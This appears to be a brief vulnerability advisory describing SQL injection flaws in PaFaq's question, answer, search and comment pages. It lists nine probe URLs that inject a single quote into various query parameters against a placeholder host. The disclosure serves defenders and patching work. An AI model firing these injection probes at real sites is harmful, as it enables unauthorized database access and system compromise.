Description
|
|
Several SQL Injection vulnerabilities were identified in PaFaq, which may be exploited by attackers to compromise a system. These flaws reside in the "question.php", "answer.php", "search.php" and "comment.php" files, which could be exploited to compromise a vulnerable system using specially crafted SQL commands.
http://vulnerable/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://vulnerable/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://vulnerable/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://vulnerable/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
http://vulnerable/index.php?act=Answer&cid=1&id=1&offset='
http://vulnerable/index.php?act=Search&code=01&search_item='
http://vulnerable/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://vulnerable/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://vulnerable/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4
|